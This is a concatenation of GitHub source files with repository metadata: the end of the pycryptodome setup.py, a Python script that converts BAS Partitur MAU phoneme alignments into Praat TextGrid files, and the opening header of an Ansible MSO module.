sources=["src/raw_cbc.c"]),
Extension("Crypto.Cipher._raw_cfb",
include_dirs=['src/'],
sources=["src/raw_cfb.c"]),
Extension("Crypto.Cipher._raw_ofb",
include_dirs=['src/'],
sources=["src/raw_ofb.c"]),
Extension("Crypto.Cipher._raw_ctr",
include_dirs=['src/'],
sources=["src/raw_ctr.c"]),
Extension("Crypto.Cipher._raw_ocb",
sources=["src/raw_ocb.c"]),
# Stream ciphers
Extension("Crypto.Cipher._ARC4",
include_dirs=['src/'],
sources=["src/ARC4.c"]),
Extension("Crypto.Cipher._Salsa20",
include_dirs=['src/', 'src/libtom/'],
sources=["src/Salsa20.c"]),
Extension("Crypto.Cipher._chacha20",
include_dirs=['src/'],
sources=["src/chacha20.c"]),
# Others
Extension("Crypto.Protocol._scrypt",
include_dirs=['src/'],
sources=["src/scrypt.c"]),
# Utility modules
Extension("Crypto.Util._strxor",
include_dirs=['src/'],
sources=['src/strxor.c']),
# ECC
Extension("Crypto.PublicKey._ec_ws",
include_dirs=['src/'],
sources=['src/modexp_utils.c', 'src/siphash.c', 'src/ec_ws.c', 'src/mont.c'],
),
# Math
Extension("Crypto.Math._modexp",
include_dirs=['src/'],
sources=['src/modexp.c', 'src/siphash.c', 'src/modexp_utils.c', 'src/mont.c'],
),
]
if use_separate_namespace:
# Fix-up setup information
for i in range(len(packages)):
packages[i] = packages[i].replace("Crypto", "Cryptodome")
new_package_data = {}
for k, v in package_data.items():
new_package_data[k.replace("Crypto", "Cryptodome")] = v
package_data = new_package_data
for ext in ext_modules:
ext.name = ext.name.replace("Crypto", "Cryptodome")
# Recreate lib/Cryptodome from scratch, unless it is the only
# directory available
if os.path.isdir("lib/Crypto"):
create_cryptodome_lib()
# Add compiler specific options.
set_compiler_options(package_root, ext_modules)
# Read the version string from the package's __init__.py so it only needs to be maintained in a single file
with open(os.path.join("lib", package_root, "__init__.py")) as init_root:
for line in init_root:
if line.startswith("version_info"):
version_tuple = eval(line.split("=")[1])
version_string = ".".join([str(x) for x in version_tuple])
setup(
name=project_name,
version=version_string,
description="Cryptographic library for Python",
long_description=longdesc,
author="Helder Eijs",
author_email="[email protected]",
url="https://www.pycryptodome.org",
platforms='Posix; MacOS X; Windows',
zip_safe=False,
python_requires='>=2.6, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*',
classifiers=[
'Development Status :: 5 - Production/Stable',
'License :: OSI Approved :: BSD License',
'License :: OSI Approved :: Apache Software License',
'License :: Public Domain',
'Intended Audience :: Developers',
'Operating System :: Unix',
'Operating System :: Microsoft :: Windows',
'Operating System :: MacOS :: MacOS X',
'Topic :: Security :: Cryptography',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
],
license="BSD, Public Domain, Apache",
packages=packages,
package_dir={"": "lib"},
package_data=package_data,
cmdclass={
'build_ext': PCTBuildExt,
'build_py': PCTBuildPy,
'test': TestCommand,
},
ext_modules=ext_modules,
)
| {
"content_hash": "5c23e2292fce05af25399592f6bd020d",
"timestamp": "",
"source": "github",
"line_count": 484,
"max_line_length": 105,
"avg_line_length": 33.03719008264463,
"alnum_prop": 0.5867417135709818,
"repo_name": "kawamon/hue",
"id": "74ea6e114fc954609bd9bf0756fa59000309c2d5",
"size": "17015",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "desktop/core/ext-py/pycryptodomex-3.9.7/setup.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ABAP",
"bytes": "962"
},
{
"name": "ActionScript",
"bytes": "1133"
},
{
"name": "Ada",
"bytes": "99"
},
{
"name": "Assembly",
"bytes": "5786"
},
{
"name": "AutoHotkey",
"bytes": "720"
},
{
"name": "Batchfile",
"bytes": "118907"
},
{
"name": "C",
"bytes": "3196521"
},
{
"name": "C#",
"bytes": "83"
},
{
"name": "C++",
"bytes": "308860"
},
{
"name": "COBOL",
"bytes": "4"
},
{
"name": "CSS",
"bytes": "1050129"
},
{
"name": "Cirru",
"bytes": "520"
},
{
"name": "Clojure",
"bytes": "794"
},
{
"name": "CoffeeScript",
"bytes": "403"
},
{
"name": "ColdFusion",
"bytes": "86"
},
{
"name": "Common Lisp",
"bytes": "632"
},
{
"name": "D",
"bytes": "324"
},
{
"name": "Dart",
"bytes": "489"
},
{
"name": "Dockerfile",
"bytes": "10981"
},
{
"name": "Eiffel",
"bytes": "375"
},
{
"name": "Elixir",
"bytes": "692"
},
{
"name": "Elm",
"bytes": "487"
},
{
"name": "Emacs Lisp",
"bytes": "411907"
},
{
"name": "Erlang",
"bytes": "487"
},
{
"name": "Forth",
"bytes": "979"
},
{
"name": "FreeMarker",
"bytes": "1017"
},
{
"name": "G-code",
"bytes": "521"
},
{
"name": "GLSL",
"bytes": "512"
},
{
"name": "Genshi",
"bytes": "946"
},
{
"name": "Gherkin",
"bytes": "699"
},
{
"name": "Go",
"bytes": "7312"
},
{
"name": "Groovy",
"bytes": "1080"
},
{
"name": "HTML",
"bytes": "24999718"
},
{
"name": "Haskell",
"bytes": "512"
},
{
"name": "Haxe",
"bytes": "447"
},
{
"name": "HiveQL",
"bytes": "43"
},
{
"name": "Io",
"bytes": "140"
},
{
"name": "JSONiq",
"bytes": "4"
},
{
"name": "Java",
"bytes": "471854"
},
{
"name": "JavaScript",
"bytes": "28075556"
},
{
"name": "Julia",
"bytes": "210"
},
{
"name": "Jupyter Notebook",
"bytes": "73168"
},
{
"name": "LSL",
"bytes": "2080"
},
{
"name": "Lean",
"bytes": "213"
},
{
"name": "Lex",
"bytes": "264449"
},
{
"name": "Liquid",
"bytes": "1883"
},
{
"name": "LiveScript",
"bytes": "5747"
},
{
"name": "Lua",
"bytes": "78382"
},
{
"name": "M4",
"bytes": "1377"
},
{
"name": "MATLAB",
"bytes": "203"
},
{
"name": "Makefile",
"bytes": "269655"
},
{
"name": "Mako",
"bytes": "3614942"
},
{
"name": "Mask",
"bytes": "597"
},
{
"name": "Myghty",
"bytes": "936"
},
{
"name": "Nix",
"bytes": "2212"
},
{
"name": "OCaml",
"bytes": "539"
},
{
"name": "Objective-C",
"bytes": "2672"
},
{
"name": "OpenSCAD",
"bytes": "333"
},
{
"name": "PHP",
"bytes": "662"
},
{
"name": "PLSQL",
"bytes": "31565"
},
{
"name": "PLpgSQL",
"bytes": "6006"
},
{
"name": "Pascal",
"bytes": "1412"
},
{
"name": "Perl",
"bytes": "4327"
},
{
"name": "PigLatin",
"bytes": "371"
},
{
"name": "PowerShell",
"bytes": "3204"
},
{
"name": "Python",
"bytes": "76440000"
},
{
"name": "R",
"bytes": "2445"
},
{
"name": "Roff",
"bytes": "95764"
},
{
"name": "Ruby",
"bytes": "1098"
},
{
"name": "Rust",
"bytes": "495"
},
{
"name": "Scala",
"bytes": "1541"
},
{
"name": "Scheme",
"bytes": "559"
},
{
"name": "Shell",
"bytes": "190718"
},
{
"name": "Smarty",
"bytes": "130"
},
{
"name": "TSQL",
"bytes": "10013"
},
{
"name": "Tcl",
"bytes": "899"
},
{
"name": "TeX",
"bytes": "165743"
},
{
"name": "Thrift",
"bytes": "317058"
},
{
"name": "TypeScript",
"bytes": "1607"
},
{
"name": "VBA",
"bytes": "2884"
},
{
"name": "VBScript",
"bytes": "938"
},
{
"name": "VHDL",
"bytes": "830"
},
{
"name": "Vala",
"bytes": "485"
},
{
"name": "Verilog",
"bytes": "274"
},
{
"name": "Vim Snippet",
"bytes": "226931"
},
{
"name": "XQuery",
"bytes": "114"
},
{
"name": "XSLT",
"bytes": "521413"
},
{
"name": "Yacc",
"bytes": "2133855"
}
],
"symlink_target": ""
} |
import codecs
# Use regular expressions
import re
# Nice command line argument parsing
import argparse
# Module to check the properties of wave files
import wave
# Module to check files and paths
import os.path
import sys
# Create an command-line argument parser
parser = argparse.ArgumentParser(description="Convert the transcription in a BAS Partitur file with a MAU tier to the Praat TextGrid format.")
# Add arguments with sensible defaults to parser
parser.add_argument("inputfilename", help="the name of the input BAS Partitur file with MAU tier")
parser.add_argument("originalfilename", help="the name of the original BAS Partitur file")
parser.add_argument("outputfilename", help="the name of the output Praat TextGrid file")
parser.add_argument("-inputenc", "--inputenc", required=False, default="utf-8", help="the input character encoding to be used for the BAS Partitur file with MAU tier (defaults to UTF-8)")
parser.add_argument("-origenc", "--origenc", required=False, default="utf-8", help="the input character encoding to be used for the original BAS Partitur file (defaults to UTF-8)")
parser.add_argument("-outputenc", "--outputenc", required=False, default="utf-8", help="the output character encoding to be used (defaults to UTF-8)")
parser.add_argument("-wave", "--wave", required=False, help="the file name of the associated wave file")
parser.add_argument("-samplerate", "--samplerate", required=False, type=int, help="the sample rate of the associated wave file in Hz")
parser.add_argument("-debuglevel", "--debuglevel", required=False, default=1, type=int, choices=[0,1], help="the debug level to be used (0 --> no status messages, 1 --> print status messages)")
# Parse command-line arguments
args = vars(parser.parse_args())
# Process obligatory command-line arguments
input_file_name = args["inputfilename"]
original_file_name = args["originalfilename"]
output_file_name = args["outputfilename"]
# Process optional command-line arguments
input_encoding = args["inputenc"]
original_encoding = args["origenc"]
output_encoding = args["outputenc"]
sample_rate = args["samplerate"]
debug_level = args["debuglevel"]
# If a wave file was specified, test whether it exists
if "wave" in args and args["wave"] is not None:
wave_file_name = args["wave"]
if os.path.exists(wave_file_name) and os.path.isfile(wave_file_name):
# Try to open it with wave module
wave_file = wave.open(wave_file_name, "r")
# Try to determine its properties
sample_rate = wave_file.getframerate()
else:
wave_file_name = None
if sample_rate is None:
print("You either have to provide the path to the wave file or to specify the sample rate manually.")
sys.exit()
# Function to read in the ORT tier from a BAS Partitur file
# Arguments:
# 1. file name
# 2. encoding (defaults to utf-8)
# Returns a list of words as tuples (word_id, word)
def readORTFromOriginalBASFile(file_name, encoding="utf-8"):
bas_file = codecs.open(file_name,"r",encoding)
# Print status message
if debug_level == 1:
print("Extracting ORT tier from original BAS Partitur file", file_name)
# Make a new list of words
words = []
# Count line numbers for error reporting
line_number = 0
# Read the BAS Partitur file line by line
for line in bas_file:
# Increase line number
line_number += 1
# Remove superfluous whitespace
line = line.strip()
# Skip empty lines
if line == "": continue
# Test if the line contains information in the ORT tier
if line.startswith("ORT:"):
# Test whether the line can be divided into 3 elements:
# tier marker, word_id and word
elements = line.split()
if len(elements) != 3:
print("Found an ORT tier that does not contain 3 elements (tier marker, number, phoneme) in line:", line_number)
sys.exit()
# Unpack elements into separate variables
(tier_marker, word_id, word) = elements
            # Append the current word id and word form to the list of words
words.append((word_id, word))
# Close the file
bas_file.close()
# Return the list of words
return words
# Function to read in the KAN tier from a BAS Partitur file
# Arguments:
# 1. file name
# 2. encoding (defaults to utf-8)
# Returns a list of words as tuples (word_id, word)
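# Illustrative example of a KAN tier line (the transcription itself may contain spaces):
#   KAN: 0 h E l o U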
def readKANFromOriginalBASFile(file_name, encoding="utf-8"):
bas_file = codecs.open(file_name,"r",encoding)
# Print status message
if debug_level == 1:
print("Extracting KAN tier from original BAS Partitur file", file_name)
# Make a new list of words
words = []
# Count line numbers for error reporting
line_number = 0
# Read the BAS Partitur file line by line
for line in bas_file:
# Increase line number
line_number += 1
# Remove superfluous whitespace
line = line.strip()
# Skip empty lines
if line == "": continue
        # Test if the line contains information in the KAN tier
if line.startswith("KAN:"):
            # Test whether the line can be divided into at least 3 elements:
            # tier marker, word_id and the canonical transcription (which may contain spaces)
elements = line.split()
if len(elements) < 3:
print("Found a KAN tier that does not contain at least 3 elements (tier marker, number, phoneme) in line:", line_number)
sys.exit()
if len(elements) == 3:
# Unpack elements into separate variables
(tier_marker, word_id, word) = elements
else:
# Unpack elements into separate variables
tier_marker = elements.pop(0)
word_id = elements.pop(0)
word = " ".join(elements)
            # Append the current word id and canonical transcription to the list of words
words.append((word_id, word))
# Close the file
bas_file.close()
# Return the list of words
return words
# Function to read in the MAU tier from a BAS Partitur file
# Arguments:
# 1. file name
# 2. encoding (defaults to utf-8)
# Returns a list of phonemes as tuples (start, duration, word_id, phoneme)
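# Illustrative example of a MAU tier line (start and duration are given in samples):
#   MAU: 4000 1599 0 h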
def readMAUFromBASFile(file_name, encoding="utf-8"):
bas_file = codecs.open(file_name,"r",encoding)
# Print status message
if debug_level == 1:
print("Extracting MAU tier from BAS Partitur file", file_name)
    # Make a new list of phonemes
phonemes = []
# Count line numbers for error reporting
line_number = 0
# Read the BAS Partitur file line by line
for line in bas_file:
# Increase line number
line_number += 1
# Remove superfluous whitespace
line = line.strip()
# Skip empty lines
if line == "": continue
        # Test if the line contains information in the MAU tier
if line.startswith("MAU:"):
# Test whether the line can be divided into 5 elements:
# tier marker, start, duration, word_id, and phoneme
elements = line.split()
if len(elements) != 5:
print("Found a MAU tier that does not contain 5 elements (tier marker, start time, duration, word id, phoneme) in line:", line_number)
sys.exit()
# Unpack elements into separate variables
(tier_marker, start, duration, word_id, phoneme) = elements
            # Append the current phoneme entry (start, duration, word id, phoneme) to the list of phonemes
phonemes.append((start, duration, word_id, phoneme))
# Close the file
bas_file.close()
# Return the list of phonemes
return phonemes
# Function to read in the RID tier from a BAS Partitur file
# Arguments:
# 1. file name
# 2. encoding (defaults to utf-8)
# Returns a list of utterances as lists of [utterance_id, list of word_ids]
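# Illustrative example of a RID tier line (word ids are comma-separated):
#   RID: 0,1,2 utt1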
def readRIDFromOriginalBASFile(file_name, encoding="utf-8"):
bas_file = codecs.open(file_name,"r",encoding)
# Print status message
if debug_level == 1:
print("Extracting RID tier from Original BAS Partitur file", file_name)
    # Make a new list of utterances
utterances = []
# Count line numbers for error reporting
line_number = 0
# Read the BAS Partitur file line by line
for line in bas_file:
# Increase line number
line_number += 1
# Remove superfluous whitespace
line = line.strip()
# Skip empty lines
if line == "": continue
        # Test if the line contains information in the RID tier
if line.startswith("RID:"):
            # Test whether the line can be divided into at least 3 elements:
            # tier marker, word ids, and utterance id
elements = line.split()
if len(elements) < 3:
print("Found a RID tier that does not contain at least 3 elements (tier marker, word ids, utterance id) in line:", line_number)
sys.exit()
elif len(elements) == 3:
# Unpack elements into separate variables
(tier_marker, word_ids, utterance_id) = elements
else:
tier_marker = elements[0]
word_ids = elements[1]
utterance_id = " ".join(elements[2:])
# Split the word ids
list_of_word_ids = word_ids.split(",")
# Append the current utterance into the list of utterances
utterances.append([utterance_id, list_of_word_ids])
# Close the file
bas_file.close()
# Return the list of utterances
return utterances
# Function to combine the start and end times of phonemes into those for words
# Argument:
# 1. A list of phonemes as created by readMAUFromBASFile
# returns a dictionary from word ids to pairs of (start_time, end_time)
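# Illustrative example: phonemes [("4000", "1599", "0", "h"), ("5599", "800", "0", "a")]
# yield {"0": (4000, 6399)}, i.e. the earliest start and latest end time per word id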
def combinePhonemesIntoWords(phonemes):
# Print status report
if debug_level == 1:
print("Combining phoneme start and end times into word start and end times.")
# Dictionary of word ids
word_ids = {}
# Go through list of phonemes
for (start, duration, word_id, phoneme) in phonemes:
# Ignore pauses, etc.
if word_id == "-1":
continue
# Determine whether phonemes of the current word have already been processed
if word_id in word_ids:
# Old start and end time
(old_start_time, old_end_time) = word_ids[word_id]
# Calculate the start and end times of the current phoneme
cur_start_time = int(start)
cur_end_time = int(start) + int(duration)
# Is the current phoneme's start time lower than the old word start time?
if cur_start_time < old_start_time:
new_start_time = cur_start_time
else:
new_start_time = old_start_time
# Is the current phoneme's end time higher than the old word end time?
if cur_end_time > old_end_time:
new_end_time = cur_end_time
else:
new_end_time = old_end_time
# Put updated start and end time into dictionary
word_ids[word_id] = (new_start_time, new_end_time)
else:
new_start_time = int(start)
new_end_time = int(start) + int(duration)
# Put initial start and end time into dictionary
word_ids[word_id] = (new_start_time, new_end_time)
# Return the dictionary of start and end times for words
return word_ids
# Function to combine the start and end times of words into those for utterances
# Arguments:
# 1. A list of utterances as created by readRIDFromOriginalBASFile
# 2. A dictionary of word start and end times as created by combinePhonemesIntoWords
# returns a dictionary from utterance ids to pairs of (start_time, end_time)
def combineWordsIntoUtterances(utterances, words):
# Print status report
if debug_level == 1:
print("Combining word start and end times into utterance start and end times.")
# Dictionary of utterance ids
utterance_ids = {}
    # Go through the list of utterances
for utterance in utterances:
utterance_id = utterance[0]
list_of_word_ids = utterance[1]
# print("Utterance id is", utterance_id)
# print("List of word ids is", list_of_word_ids)
# Look up the start time of the first and last words in the utterance
first_word_id = list_of_word_ids[0]
last_word_id = list_of_word_ids[-1]
# Determine the start and end times of these words
if first_word_id in words:
(first_word_start_time, first_word_end_time) = words[first_word_id]
else:
print("Could not find word id", first_word_id, "contained in utterance id", utterance_id)
sys.exit()
if last_word_id in words:
(last_word_start_time, last_word_end_time) = words[last_word_id]
else:
print("Could not find word id", last_word_id, "contained in utterance id", utterance_id)
sys.exit()
# Combine start time of first word and end time of last word into
# utterance start and end times
utterance_start_time = first_word_start_time
utterance_end_time = last_word_end_time
# Put the utterance start and end times into the utterance dictionary
utterance_ids[utterance_id] = (utterance_start_time, utterance_end_time)
# Return the dictionary of start and end times for utterances
return utterance_ids
# Function to determine the minimal start time for words or utterances
# Argument:
# 1. A dictionary of ids with values of (start time, end time)
# returns the minimal start time
def getMinimalStartTime(id_dict):
# Current minimal start time
min_start_time = -1
# Go through all entries in the dictionary
for entry in id_dict:
cur_start_time = id_dict[entry][0]
# If no start time has been looked at yet
if min_start_time == -1:
min_start_time = cur_start_time
else:
# Is the current start time lower than the lowest value seen yet
if cur_start_time < min_start_time:
# Then take it as the new minimal start time
min_start_time = cur_start_time
# Return the minimal start time found
return min_start_time
# Function to determine the maximal end time for words or utterances
# Argument:
# 1. A dictionary of ids with values of (start time, end time)
# returns the maximal end time
def getMaximalEndTime(id_dict):
# Current maximal end time
max_end_time = -1
# Go through all entries in the dictionary
for entry in id_dict:
cur_end_time = id_dict[entry][1]
# If no end time has been looked at yet
if max_end_time == -1:
max_end_time = cur_end_time
else:
# Is the current end time higher than the highest value seen yet
if cur_end_time > max_end_time:
# Then take it as the new maximal end time
max_end_time = cur_end_time
# Return the maximal end time found
return max_end_time
# Function to produce a dictionary from word ids to the orthographic forms of words
# Argument:
# 1. A list of words as produced by readORTFromOriginalBASFile
# returns a dictionary from word ids to orthographic word forms
def makeWordDictionary(list_of_words):
# A dictionary of words
word_dict = {}
# Go through the list of words
for (word_id, word) in list_of_words:
# Put the word into the dictionary
word_dict[word_id] = word
# Return the dictionary
return word_dict
# Function to print a Praat TextGrid header
# Arguments:
# 1. Filehandle of the file to print to
# 2. The number of tiers to be printed
# 3. The start time (usually 0)
# 4. The end time
# 5. The sample rate (in order to convert MAU times into seconds)
def printPraatTextGridHeader(file_handle, num_tiers, start_time, end_time, sample_rate=sample_rate):
# Print the TextGrid header
print("File type = \"ooTextFile\"", file=file_handle)
print("Object class = \"TextGrid\"", file=file_handle)
# Print empty line
print(file=file_handle)
# Calculate start time in seconds
start_time_seconds = round(start_time / sample_rate, 3)
# Calculate end time in seconds
end_time_seconds = round(end_time / sample_rate, 3)
print("xmin =", "%.3f" % start_time_seconds, file=file_handle)
print("xmax =", "%.3f" % end_time_seconds, file=file_handle)
print("tiers? <exists>", file=file_handle)
print("size =", str(num_tiers), file=file_handle)
# Print first line of tiers list
print("item []:", file=file_handle)
# Print status report
if debug_level == 1:
print("Printing Praat TextGrid header to output file", output_file_name)
# Function to print the UTT(erance) tier
# Arguments:
# 1. The file handle
# 2. The list of utterances as produced by readRIDFromOriginalBASFile
# 3. A dictionary from utterance ids to start and end times
# 4. A dictionary from word ids to orthographic word forms
# 5. The number of the tier in the TextGrid file
# 6. The start time (usually 0)
# 7. The end time
# 8. The sample rate (in order to convert MAU times into seconds)
def printUTT(file_handle, utterance_list, utterance_times, word_dict, tier_number, start_time, end_time, sample_rate = sample_rate):
# Print status report
if debug_level == 1:
print("Printing UTT (utterances) tier.")
# Output header for current tier
print("\titem [" + str(tier_number) + "]:", file=file_handle)
print("\t\tclass = \"IntervalTier\"", file=file_handle)
print("\t\tname = \"UTT\"", file=file_handle)
# Calculate start time in seconds
start_time_seconds = round(start_time / sample_rate, 3)
# Calculate end time in seconds
end_time_seconds = round(end_time / sample_rate, 3)
print("\t\txmin =", "%.3f" % start_time_seconds, file=file_handle)
print("\t\txmax =", "%.3f" % end_time_seconds, file=file_handle)
# Determine the number of utterances
number_of_utterances = len(utterance_list)
print("\t\tintervals: size =", str(number_of_utterances), file=file_handle)
# Output the individual intervals
interval_number = 0
# Go through the list of utterances
for utterance in utterance_list:
# Increase interval number
interval_number += 1
utterance_id = utterance[0]
word_ids = utterance[1]
# Look up the utterance start and end times
if utterance_id in utterance_times:
utterance_start_time = utterance_times[utterance_id][0]
utterance_end_time = utterance_times[utterance_id][1]
# Calculate start time in seconds
utterance_start_time_seconds = round(utterance_start_time / sample_rate, 3)
# Calculate end time in seconds
utterance_end_time_seconds = round(utterance_end_time / sample_rate, 3)
else:
print("Could not determine utterance start and end times for utterance", utterance_id)
sys.exit()
# Look up the words in the utterance
words = []
for word_id in word_ids:
# Look up the word_id in the dictionary
if word_id in word_dict:
words.append(word_dict[word_id])
else:
print("Could not found orthographic form of word id", word_id)
sys.exit()
# Combine words into utterance text
utterance_text = " ".join(words)
# Output the interval for the current utterance
print("\t\tintervals [" + str(interval_number) + "]:", file=file_handle)
print("\t\t\txmin =", "%.3f" % utterance_start_time_seconds, file=file_handle)
print("\t\t\txmax =", "%.3f" % utterance_end_time_seconds, file=file_handle)
print("\t\t\ttext =", utterance_text, file=file_handle)
# Function to print the ORT(hography) tier
# Arguments:
# 1. The file handle
# 2. The list of ORT words as produced by readORTFromOriginalBASFile
# 3. A dictionary from word ids to start and end times
# 4. The number of the tier in the TextGrid file
# 5. The start time (usually 0)
# 6. The end time
# 7. The sample rate (in order to convert MAU times into seconds)
def printORT(file_handle, ort_list, word_times, tier_number, start_time, end_time, sample_rate = sample_rate):
# Print status report
if debug_level == 1:
print("Printing ORT (orthography) tier.")
# Output header for current tier
print("\titem [" + str(tier_number) + "]:", file=file_handle)
print("\t\tclass = \"IntervalTier\"", file=file_handle)
print("\t\tname = \"ORT\"", file=file_handle)
# Calculate start time in seconds
start_time_seconds = round(start_time / sample_rate, 3)
# Calculate end time in seconds
end_time_seconds = round(end_time / sample_rate, 3)
print("\t\txmin =", "%.3f" % start_time_seconds, file=file_handle)
print("\t\txmax =", "%.3f" % end_time_seconds, file=file_handle)
# Determine the number of words
number_of_words = len(ort_list)
print("\t\tintervals: size =", str(number_of_words), file=file_handle)
# Output the individual intervals
interval_number = 0
# Go through the list of words
for word in ort_list:
# Increase interval number
interval_number += 1
word_id = word[0]
word_ort = word[1]
# Look up the word start and end times
if word_id in word_times:
word_start_time = word_times[word_id][0]
word_end_time = word_times[word_id][1]
# Calculate start time in seconds
word_start_time_seconds = round(word_start_time / sample_rate, 3)
# Calculate end time in seconds
word_end_time_seconds = round(word_end_time / sample_rate, 3)
else:
print("Could not determine word start and end times for word", word_id)
sys.exit()
# Output the interval for the current word
print("\t\tintervals [" + str(interval_number) + "]:", file=file_handle)
print("\t\t\txmin =", "%.3f" % word_start_time_seconds, file=file_handle)
print("\t\t\txmax =", "%.3f" % word_end_time_seconds, file=file_handle)
print("\t\t\ttext =", word_ort, file=file_handle)
# Function to print the KAN (canonical transcription) tier
# Arguments:
# 1. The file handle
# 2. The list of KAN words as produced by readKANFromOriginalBASFile
# 3. A dictionary from word ids to start and end times
# 4. The number of the tier in the TextGrid file
# 5. The start time (usually 0)
# 6. The end time
# 7. The sample rate (in order to convert MAU times into seconds)
def printKAN(file_handle, kan_list, word_times, tier_number, start_time, end_time, sample_rate = sample_rate):
# Print status report
if debug_level == 1:
print("Printing KAN (canonical transcription) tier.")
# Output header for current tier
print("\titem [" + str(tier_number) + "]:", file=file_handle)
print("\t\tclass = \"IntervalTier\"", file=file_handle)
print("\t\tname = \"KAN\"", file=file_handle)
# Calculate start time in seconds
start_time_seconds = round(start_time / sample_rate, 3)
# Calculate end time in seconds
end_time_seconds = round(end_time / sample_rate, 3)
print("\t\txmin =", "%.3f" % start_time_seconds, file=file_handle)
print("\t\txmax =", "%.3f" % end_time_seconds, file=file_handle)
# Determine the number of words
number_of_words = len(kan_list)
print("\t\tintervals: size =", str(number_of_words), file=file_handle)
# Output the individual intervals
interval_number = 0
# Go through the list of words
for word in kan_list:
# Increase interval number
interval_number += 1
word_id = word[0]
word_kan = word[1]
# Look up the word start and end times
if word_id in word_times:
word_start_time = word_times[word_id][0]
word_end_time = word_times[word_id][1]
# Calculate start time in seconds
word_start_time_seconds = round(word_start_time / sample_rate, 3)
# Calculate end time in seconds
word_end_time_seconds = round(word_end_time / sample_rate, 3)
else:
print("Could not determine word start and end times for word", word_id)
sys.exit()
# Output the interval for the current word
print("\t\tintervals [" + str(interval_number) + "]:", file=file_handle)
print("\t\t\txmin =", "%.3f" % word_start_time_seconds, file=file_handle)
print("\t\t\txmax =", "%.3f" % word_end_time_seconds, file=file_handle)
print("\t\t\ttext =", word_kan, file=file_handle)
# Function to print the MAU (time-aligned phoneme) tier
# Arguments:
# 1. The file handle
# 2. The list of MAU phonemes as produced by readMAUFromBASFile
# 3. The number of the tier in the TextGrid file
# 4. The start time (usually 0)
# 5. The end time
# 6. The sample rate (in order to convert MAU times into seconds)
def printMAU(file_handle, mau_list, tier_number, start_time, end_time, sample_rate = sample_rate):
# Print status report
if debug_level == 1:
print("Printing MAU (time-aligned phoneme) tier.")
# Output header for current tier
print("\titem [" + str(tier_number) + "]:", file=file_handle)
print("\t\tclass = \"IntervalTier\"", file=file_handle)
print("\t\tname = \"MAU\"", file=file_handle)
# Calculate start time in seconds
start_time_seconds = round(start_time / sample_rate, 3)
# Calculate end time in seconds
end_time_seconds = round(end_time / sample_rate, 3)
print("\t\txmin =", "%.3f" % start_time_seconds, file=file_handle)
print("\t\txmax =", "%.3f" % end_time_seconds, file=file_handle)
# Determine the number of phonemes
number_of_phonemes = len(mau_list)
print("\t\tintervals: size =", str(number_of_phonemes), file=file_handle)
# Output the individual intervals
interval_number = 0
# Go through the list of phonemes
for phoneme in mau_list:
# Increase interval number
interval_number += 1
phoneme_start_time = int(phoneme[0])
phoneme_end_time = phoneme_start_time + int(phoneme[1])
phoneme_text = phoneme[3]
# Calculate start time in seconds
phoneme_start_time_seconds = round(phoneme_start_time / sample_rate, 3)
# Calculate end time in seconds
phoneme_end_time_seconds = round(phoneme_end_time / sample_rate, 3)
# Output the interval for the current phoneme
print("\t\tintervals [" + str(interval_number) + "]:", file=file_handle)
print("\t\t\txmin =", "%.3f" % phoneme_start_time_seconds, file=file_handle)
print("\t\t\txmax =", "%.3f" % phoneme_end_time_seconds, file=file_handle)
print("\t\t\ttext =", str(phoneme_text), file=file_handle)
# Print status report
if debug_level == 1:
print("Converting BAS Partitur file", input_file_name, "to Praat TextGrid file", output_file_name, "using the ORT, KAN, and RID tiers from", original_file_name + ".")
# Read in the ORT tier from the original BAS Partitur file
ort_tier = readORTFromOriginalBASFile(original_file_name, original_encoding)
# Read in the KAN tier from the original BAS Partitur file
kan_tier = readKANFromOriginalBASFile(original_file_name, original_encoding)
# Read in the RID tier from the original BAS Partitur file
rid_tier = readRIDFromOriginalBASFile(original_file_name, original_encoding)
# Read in the MAU tier from the BAS Partitur file
mau_tier = readMAUFromBASFile(input_file_name, input_encoding)
# Combine phoneme start and end times into word start and end times
word_times = combinePhonemesIntoWords(mau_tier)
# Combine word start and end times into utterance start and end times
utterance_times = combineWordsIntoUtterances(rid_tier, word_times)
# Determine start time of the first word and the end time of the last word
min_word_start_time = getMinimalStartTime(word_times)
max_word_end_time = getMaximalEndTime(word_times)
# Determine start time of the first utterance and the end time of the last utterance
min_utterance_start_time = getMinimalStartTime(utterance_times)
max_utterance_end_time = getMaximalEndTime(utterance_times)
# Make a dictionary from word ids to word forms
word_dict = makeWordDictionary(ort_tier)
# Create output file
output_file = codecs.open(output_file_name, "w", output_encoding)
# Determine absolute start and end times
# Start time of the first phoneme
first_phoneme = mau_tier[0]
absolute_start_time = int(first_phoneme[0])
last_phoneme = mau_tier[-1]
absolute_end_time = int(last_phoneme[0]) + int(last_phoneme[1])
# Print Praat TextGrid header
printPraatTextGridHeader(output_file, start_time = absolute_start_time, end_time = absolute_end_time, num_tiers = 4)
# Print utterance tier (UTT)
printUTT(output_file, rid_tier, utterance_times, word_dict, tier_number = 1, start_time = min_utterance_start_time, end_time = max_utterance_end_time)
# Print orthography tier (ORT)
printORT(output_file, ort_tier, word_times, tier_number = 2, start_time = min_word_start_time, end_time = max_word_end_time)
# Print canonical transcription tier (KAN)
printKAN(output_file, kan_tier, word_times, tier_number = 3, start_time = min_word_start_time, end_time = max_word_end_time)
# Print automatically time-aligned phoneme tier (MAU)
printMAU(output_file, mau_tier, tier_number = 4, start_time = absolute_start_time, end_time = absolute_end_time)
# Close output file
output_file.close()
| {
"content_hash": "a3de629414688234bd74dd5d9beb4a86",
"timestamp": "",
"source": "github",
"line_count": 867,
"max_line_length": 193,
"avg_line_length": 36.089965397923876,
"alnum_prop": 0.6217961009907319,
"repo_name": "janstrunk/LangDocMAUS",
"id": "3973df2d7e7c15703a90c5f6290d455b9adb91f9",
"size": "32060",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "MAU2TextGrid.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "2339"
},
{
"name": "Python",
"bytes": "168231"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: mso_schema_template_bd
